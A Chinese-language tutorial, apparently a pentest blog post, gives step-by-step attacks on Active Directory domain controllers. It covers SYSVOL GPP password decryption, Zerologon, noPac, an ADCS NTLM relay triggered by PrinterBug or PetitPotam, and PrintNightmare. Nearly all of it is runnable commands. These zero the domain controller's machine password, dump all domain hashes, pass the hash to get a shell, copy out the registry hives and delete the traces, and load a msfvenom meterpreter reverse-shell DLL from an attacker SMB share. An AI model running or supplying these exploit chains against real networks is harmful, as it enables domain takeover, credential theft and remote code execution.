SYSVOL

在域内有一个默认的共享路径:\\SYSVOL<DOMAIN>,此路径所有域内主机都可以访问,里面存放的是一些配置文件等。如果域管理员使用组策略批量管理时,填入了密码,则此密码会被放入该共享文件夹中,虽然是被加密的,但是微软公开了其AES加密密钥,所以很容易就可以解开密码。
domain_controller1.png
在\test.abc\SYSVOL\test.abc\Policies\组策略ID\Machine\Preferences\Groups目录下可以获得Group.xml,其中cpassword字段保存这密码信息。
domain_controller2.png
使用kali下的gpp-decrypt进行破解
domain_controller3.png

CVE2020-1472(zerologon)

准备工作
https://github.com/dirkjanm/CVE-2020-1472
https://github.com/SecureAuthCorp/impacket/archive/master.zip
cd impacket-master
pip install -r requirement.txt

第一步 将域控机器账户密码置空

python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP

domain_controller4.png

第二步 Dcsync获取域内用户hash

python3 secretsdump.py WIN-DDOA470G8AI$@11.1.1.131 -just-dc -no-pass 
###linux下需要将@转义为\@

domain_controller5.png
第三步 利用域管登录域控

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:30a96699356033b84283b8918a895d67 administrator@DC_IP

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

domain_controller6.png

第四步 本地解密域控SAM获取原密码

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

第五步 恢复域控机器账户密码

python3 reinstall_original_pw.py DN_NAME DC_IP ad611ebf4fd2de9448a33ba693b212f4

CVE-2021-42287&42278(nopac)

前提条件:需要一个普通域用户及密码

POC地址:https://github.com/WazeHell/sam-the-admin

python sam_the_admin.py "test/test:1qaz@WSX" -dc-ip 192.168.6.129 -dump

nopac.png

ADCS

环境如下:

主域控:10.251.251.139

辅域控ADCS: 10.251.251.141

kali:10.251.251.140

第一步 开启ntlmrelay

python3 ntlmrelayx.py -t http://10.251.251.141/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

adcs1.png

第二步 利用打印机触发反连,server2008以上不需要账户就可以触发

python3 printerbug.py hack.lab/testuser:1Qaz2Wsx@10.251.251.139 10.251.251.140 

也可以使用Petitpotam.py
python3 Petitpotam.py 反连IP 目标主机

adcs2.png

第三步 获得Base64 certificate
adcs3.png

第四步 利用证书申请票据,之后便可以dcsync获取域用户hash

Rubeus.exe asktgt /user:主域控机器账户名 /certificate:MIIRRQIBAzCCEQ8GCSqGSIb3DQEHAaCCEQAEghD8MIIQ+DCCBy8GCSqGSIb3DQEHBqCCByAwggccAgE等等 /ptt

adcs4.png

CVE-2021-1675

第一步 配置smb匿名共享

vim /etc/samba/smb.conf

    [global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

    [smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes

sudo service smbd start

第二步 生成恶意dll

#dll路径为smb服务配置的路径
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dll

第三步 下载exp进行利用

git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675
python3 CVE-2021-1675.py test.abc/test2:Admin@123@192.168.153.133 '\\192.168.153.134\smb\rever.dll'

#也可以使用mimikatz进行攻击
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"

#msf也提供了相应的模块
admin/dcerpc/cve_2021_1675_printnightmare

Q.E.D.